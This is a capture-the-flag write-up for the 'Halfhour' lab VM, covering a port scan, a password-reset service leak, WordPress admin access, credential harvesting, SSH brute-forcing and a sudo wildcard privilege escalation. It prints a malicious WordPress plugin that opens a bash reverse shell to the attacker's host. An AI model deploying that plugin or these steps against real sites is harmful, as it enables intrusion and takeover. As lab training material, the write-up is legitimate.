Halfhour box - Maze - wildcard vulnerability

Information gathering

Port scan with Nmap

└─# nmap 172.20.10.2 -sT  -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2025-09-18 01:16 EDT
Nmap scan report for halfhour.dsz (172.20.10.2)
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
1338/tcp open  wmc-log-svc
MAC Address: 08:00:27:B7:2B:50 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds

Connecting to ports 1337 and 1338 with nc yields a password: bobobo

─# nc 172.20.10.2 1337      
Please enter password: root
Incorrect password. Attempts left: 2
123
Incorrect password. Attempts left: 1
123
Too many failed attempts. Reset password? (yes/no)yes
Please send new password to port 1338.
                                                                                                                      
┌──(root㉿kali)-[~/pspy]
└─# nc 172.20.10.2 1338
Please send new password: 123
Congratulations! Password reset successful!
Old password: bobobo

Browsing port 80 and viewing the page source reveals a hostname; after adding it to the hosts file and opening it, a WordPress site appears.

<!-- halfhour.dsz -->

Enumeration (or a WPScan run) turns up a user named todd, but brute-forcing with wpscan gets nowhere. The password obtained from port 1338 logs in to the admin panel successfully, and from there a plugin upload gives a reverse shell.

Put the file below into a zip archive, upload it as a plugin and click Activate to get the reverse shell.
<?php
/**
* Plugin Name: WonderfulWebshell
* Plugin URI: https://github.com/jckhmr/wonderfullwebshell
* Description: Wordpress webshell used for demo purposes only
* Version: 1.0
* Author: jckhmr
* Author URI: https://jckhmr.net
* License: https://nosuchlicense
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/172.20.10.11/8888 0>&1'");
?>

Getting a www-data shell

└─# nc -lvvp 8888      
listening on [any] 8888 ...
connect to [172.20.10.11] from halfhour.dsz [172.20.10.2] 44354
bash: cannot set terminal process group (471): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Halfhour:/var/www/halfhour.dsz/wp-admin$ 

Looking through the database configuration file reveals a password, root123, along with the database password, and /home lists three users. We use these passwords for brute-forcing.

define( 'DB_USER', 'wpuser' );

/** Database password */
/* define( 'DB_PASSWORD', 'root123' ); */
define( 'DB_PASSWORD', 'your_strong_password' );


www-data@Halfhour:/var/www/halfhour.dsz$ ls /home
ls /home
nxal
wangjiang
welcome

Brute-force: for some reason, with nxal in the user list the password for wangjiang kept coming back wrong; after removing it, it worked.

[22][ssh] host: 172.20.10.2   login: wangjiang   password: root123
[22][ssh] host: 172.20.10.2   login: nxal   password: nxal

Log in as wangjiang and grab user.txt

wangjiang@Halfhour:~$ cat user.txt 
flag{user-4c850c5b3b2756eXXXXXX

A note says to get the welcome user first. Here an MD5 hash, 4c850c5b3b2756e67a91bad8e046ddac, turns up; it decrypts to aaaaa, but that does not log in, whereas using the hash itself directly does.

wangjiang@Halfhour:~$ cat note.txt
Get user welcome first
wangjiang@Halfhour:~$ 
wangjiang@Halfhour:~$ cat .mysql_history
_HiStOrY_V2_
CREATE\040DATABASE\040wordpress;
CREATE\040USER\040'wpuser'@'localhost'\040IDENTIFIED\040BY\040'your_strong_password';
GRANT\040ALL\040PRIVILEGES\040ON\040wordpress.*\040TO\040'wpuser'@'localhost';
FLUSH\040PRIVILEGES;
EXIT;
create\040database\040xxoo
;
use\040xxoo
show\040tables
;
CREATE\040TABLE\040IF\040NOT\040EXISTS\040user\040(
\040\040\040\040id\040INT\040AUTO_INCREMENT\040PRIMARY\040KEY,
\040\040\040\040username\040VARCHAR(50)\040NOT\040NULL\040UNIQUE,
\040\040\040\040password\040CHAR(32)\040NOT\040NULL\040COMMENT\040'MD5',
\040\040\040\040created_at\040TIMESTAMP\040DEFAULT\040CURRENT_TIMESTAMP
)\040ENGINE=InnoDB\040DEFAULT\040CHARSET=utf8mb4;
CREATE\040TABLE\040IF\040NOT\040EXISTS\040user\040(\040\040\040\040\040id\040INT\040AUTO_INCREMENT\040PRIMARY\040KEY,\040\040\040\040\040username\040VARCHAR(50)\040NOT\040NULL\040UNIQUE,\040\040\040\040\040password\040CHAR(32)\040NOT\040NULL\040COMMENT\040'MD5',\040\040\040\040\040created_at\040TIMESTAMP\040DEFAULT\040CURRENT_TIMESTAMP\040)\040ENGINE=InnoDB\040DEFAULT\040CHARSET=utf8mb4;
INSERT\040INTO\040user\040(username,\040password)\040
VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')
ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password);
INSERT\040INTO\040user\040(username,\040password)\040\040VALUES\040('welcome',\040'4c850c5b3b2756e67a91bad8e046ddac')\040ON\040DUPLICATE\040KEY\040UPDATE\040password\040=\040VALUES(password);
show\040tables;
select\040*\040from\040users;
select\040*\040from\040user;
show\040tables;
show\040databases;
wangjiang@Halfhour:~$ 

Root

Here we find that the del.sh script can be run with sudo:

User welcome may run the following commands on Halfhour:
    (ALL) NOPASSWD: /usr/local/bin/del.sh
welcome@Halfhour:/home/wangjiang$ cat /usr/local/bin/del.sh
#!/bin/bash

PATH=/usr/bin
cd /tmp
cat /root/root.txt | tr -d [A-Za-z0-9]

Method 1: wildcard issue. The bracket pattern here is not quoted.

For example, if you create a file named A in /tmp, the pattern matches A and the command becomes tr -d A, which strips only the letter A. Quoting the argument tells the shell explicitly that it is a plain string and must not undergo wildcard matching, variable substitution or any other parsing.

root@Halfhour:/home/wangjiang# cd /tmp
root@Halfhour:/tmp# touch A
root@Halfhour:/tmp# sudo /usr/local/bin/del.sh
flag{root-4c850c5b3b2756e67a91bad8e046ddac}
root@Halfhour:/tmp# 
root@Halfhour:/tmp# 
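As an added example (not code from the original write-up), the script below reproduces the unquoted `tr -d [A-Za-z0-9]` from del.sh inside a throwaway directory, with and without a file named A present, next to the quoted form that does not depend on the directory contents. The flag text and directory layout are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original write-up: reproduces the unquoted
# bracket expression from del.sh (`tr -d [A-Za-z0-9]`) in a scratch directory
# so its dependence on the working directory's contents can be observed, and
# shows the quoted form that removes that dependence.

# Same construction as del.sh: the pattern is unquoted, so the shell attempts
# filename matching against the working directory before tr receives it.
# $1 = directory to run in, $2 = input text
strip_unquoted() {
    ( cd "$1" && printf '%s' "$2" | tr -d [A-Za-z0-9] )
}

# Fixed form: the set is quoted and reaches tr verbatim. The square brackets
# are dropped because tr treats '[' and ']' as literal characters to delete,
# not as a bracket expression.
strip_quoted() {
    ( cd "$1" && printf '%s' "$2" | tr -d 'A-Za-z0-9' )
}

# Run one variant ($1) inside a fresh temporary directory that contains only
# the empty files named by the remaining arguments, and echo the result.
# The input is a constructed sample, not the box's real flag.
run_in_dir() {
    fn=$1; shift
    d=$(mktemp -d)
    for f in "$@"; do : > "$d/$f"; done
    "$fn" "$d" 'flag{root-4c85}'
    rm -rf "$d"
}

# Empty directory: the glob matches nothing and is passed through unchanged,
# so letters and digits (and literal brackets) are deleted -> "{-}"
run_in_dir strip_unquoted; echo
# Directory containing a file named A: the glob expands to "A", so only the
# letter A is deleted and the text survives intact -> "flag{root-4c85}"
run_in_dir strip_unquoted A; echo
# Quoted form ignores the directory contents -> "{-}" both times
run_in_dir strip_quoted; echo
run_in_dir strip_quoted A; echo
```

Note that quoting as `'[A-Za-z0-9]'` would also delete any literal `[` and `]` in the input, which is why the fixed form drops the brackets.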

Method 2: log in directly with the bobobo password from earlier.

welcome@Halfhour:/home/wangjiang$ su root
Password: 
root@Halfhour:/home/wangjiang# whoami
root
